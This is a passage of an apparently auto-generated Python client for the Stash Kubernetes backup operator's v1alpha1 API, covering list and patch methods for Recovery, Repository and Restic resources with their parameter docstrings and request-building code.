        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: ComGithubAppscodeStashApisStashV1alpha1RecoveryList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if '_continue' in params:
            query_params.append(('continue', params['_continue']))  # noqa: E501
        if 'field_selector' in params:
            query_params.append(('fieldSelector', params['field_selector']))  # noqa: E501
        if 'include_uninitialized' in params:
            query_params.append(('includeUninitialized', params['include_uninitialized']))  # noqa: E501
        if 'label_selector' in params:
            query_params.append(('labelSelector', params['label_selector']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501
        if 'resource_version' in params:
            query_params.append(('resourceVersion', params['resource_version']))  # noqa: E501
        if 'timeout_seconds' in params:
            query_params.append(('timeoutSeconds', params['timeout_seconds']))  # noqa: E501
        if 'watch' in params:
            query_params.append(('watch', params['watch']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/recoveries', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1RecoveryList',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def list_stash_appscode_com_v1alpha1_repository_for_all_namespaces(self, **kwargs):  # noqa: E501
        """list_stash_appscode_com_v1alpha1_repository_for_all_namespaces  # noqa: E501

        list or watch objects of kind Repository  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.list_stash_appscode_com_v1alpha1_repository_for_all_namespaces(async=True)
        >>> result = thread.get()

        :param async bool
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: ComGithubAppscodeStashApisStashV1alpha1RepositoryList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.list_stash_appscode_com_v1alpha1_repository_for_all_namespaces_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.list_stash_appscode_com_v1alpha1_repository_for_all_namespaces_with_http_info(**kwargs)  # noqa: E501
            return data

    def list_stash_appscode_com_v1alpha1_repository_for_all_namespaces_with_http_info(self, **kwargs):  # noqa: E501
        """list_stash_appscode_com_v1alpha1_repository_for_all_namespaces  # noqa: E501

        list or watch objects of kind Repository  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.list_stash_appscode_com_v1alpha1_repository_for_all_namespaces_with_http_info(async=True)
        >>> result = thread.get()

        :param async bool
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: ComGithubAppscodeStashApisStashV1alpha1RepositoryList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_stash_appscode_com_v1alpha1_repository_for_all_namespaces" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if '_continue' in params:
            query_params.append(('continue', params['_continue']))  # noqa: E501
        if 'field_selector' in params:
            query_params.append(('fieldSelector', params['field_selector']))  # noqa: E501
        if 'include_uninitialized' in params:
            query_params.append(('includeUninitialized', params['include_uninitialized']))  # noqa: E501
        if 'label_selector' in params:
            query_params.append(('labelSelector', params['label_selector']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501
        if 'resource_version' in params:
            query_params.append(('resourceVersion', params['resource_version']))  # noqa: E501
        if 'timeout_seconds' in params:
            query_params.append(('timeoutSeconds', params['timeout_seconds']))  # noqa: E501
        if 'watch' in params:
            query_params.append(('watch', params['watch']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/repositories', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1RepositoryList',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def list_stash_appscode_com_v1alpha1_restic_for_all_namespaces(self, **kwargs):  # noqa: E501
        """list_stash_appscode_com_v1alpha1_restic_for_all_namespaces  # noqa: E501

        list or watch objects of kind Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.list_stash_appscode_com_v1alpha1_restic_for_all_namespaces(async=True)
        >>> result = thread.get()

        :param async bool
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: ComGithubAppscodeStashApisStashV1alpha1ResticList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.list_stash_appscode_com_v1alpha1_restic_for_all_namespaces_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.list_stash_appscode_com_v1alpha1_restic_for_all_namespaces_with_http_info(**kwargs)  # noqa: E501
            return data

    def list_stash_appscode_com_v1alpha1_restic_for_all_namespaces_with_http_info(self, **kwargs):  # noqa: E501
        """list_stash_appscode_com_v1alpha1_restic_for_all_namespaces  # noqa: E501

        list or watch objects of kind Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.list_stash_appscode_com_v1alpha1_restic_for_all_namespaces_with_http_info(async=True)
        >>> result = thread.get()

        :param async bool
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: ComGithubAppscodeStashApisStashV1alpha1ResticList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_stash_appscode_com_v1alpha1_restic_for_all_namespaces" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if '_continue' in params:
            query_params.append(('continue', params['_continue']))  # noqa: E501
        if 'field_selector' in params:
            query_params.append(('fieldSelector', params['field_selector']))  # noqa: E501
        if 'include_uninitialized' in params:
            query_params.append(('includeUninitialized', params['include_uninitialized']))  # noqa: E501
        if 'label_selector' in params:
            query_params.append(('labelSelector', params['label_selector']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501
        if 'resource_version' in params:
            query_params.append(('resourceVersion', params['resource_version']))  # noqa: E501
        if 'timeout_seconds' in params:
            query_params.append(('timeoutSeconds', params['timeout_seconds']))  # noqa: E501
        if 'watch' in params:
            query_params.append(('watch', params['watch']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/restics', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1ResticList',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
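The `limit`/`continue` contract described in the docstrings above applies to every `list_*_for_all_namespaces` method: request a page, then re-issue the same query echoing the server's continue token until the token comes back empty. A minimal sketch of that loop, assuming a dict-returning `list_fn` stands in for one of these methods (the real client returns a typed `*List` object whose token lives at `metadata._continue`):

```python
# Drain a paginated Kubernetes-style list endpoint.
# `list_fn` is a hypothetical stand-in for a list_* method: it accepts
# `limit` and `_continue` kwargs and returns {'items': [...], 'continue': str}.
def list_all(list_fn, page_size=100):
    items = []
    token = None
    while True:
        kwargs = {'limit': page_size}
        if token:
            # Echo the server-defined token with otherwise identical params.
            kwargs['_continue'] = token
        page = list_fn(**kwargs)
        items.extend(page['items'])
        token = page.get('continue')
        if not token:
            # An empty or absent continue token means no more results.
            return items
```

Per the docstring, a 410 ResourceExpired response would require restarting the loop without the token; that error path is omitted from this sketch.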

    def patch_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, body, **kwargs):  # noqa: E501
        """patch_stash_appscode_com_v1alpha1_namespaced_recovery  # noqa: E501

        partially update the specified Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Recovery
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.patch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
        else:
            (data) = self.patch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
            return data

    def patch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, body, **kwargs):  # noqa: E501
        """patch_stash_appscode_com_v1alpha1_namespaced_recovery  # noqa: E501

        partially update the specified Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Recovery
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_stash_appscode_com_v1alpha1_namespaced_recovery" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `patch_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `patch_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `patch_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries/{name}', 'PATCH',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1Recovery',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
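
    # A minimal usage sketch (kept as a comment so it never runs at import time;
    # it assumes a configured instance `api` of this class and an existing
    # Recovery object -- the names "my-recovery", "default", and the patched
    # field are illustrative, not taken from this file):
    #
    #     patch_body = {"metadata": {"labels": {"restored": "true"}}}
    #     recovery = api.patch_stash_appscode_com_v1alpha1_namespaced_recovery(
    #         "my-recovery", "default", patch_body)
    #
    # The dict body is serialized as a merge patch; which patch semantics apply
    # is negotiated via the Content-Type values listed in the method above.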

    def patch_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, body, **kwargs):  # noqa: E501
        """patch_stash_appscode_com_v1alpha1_namespaced_repository  # noqa: E501

        partially update the specified Repository  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Repository (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Repository
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.patch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
        else:
            (data) = self.patch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
            return data

    def patch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, body, **kwargs):  # noqa: E501
        """patch_stash_appscode_com_v1alpha1_namespaced_repository  # noqa: E501

        partially update the specified Repository  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Repository (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Repository
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_stash_appscode_com_v1alpha1_namespaced_repository" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `patch_stash_appscode_com_v1alpha1_namespaced_repository`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `patch_stash_appscode_com_v1alpha1_namespaced_repository`")  # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `patch_stash_appscode_com_v1alpha1_namespaced_repository`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories/{name}', 'PATCH',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1Repository',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def patch_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, body, **kwargs):  # noqa: E501
        """patch_stash_appscode_com_v1alpha1_namespaced_restic  # noqa: E501

        partially update the specified Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Restic (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Restic
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.patch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
        else:
            (data) = self.patch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
            return data

    def patch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, body, **kwargs):  # noqa: E501
        """patch_stash_appscode_com_v1alpha1_namespaced_restic  # noqa: E501

        partially update the specified Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Restic (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Restic
                 If the method is called asynchronously,
                 returns the request thread.
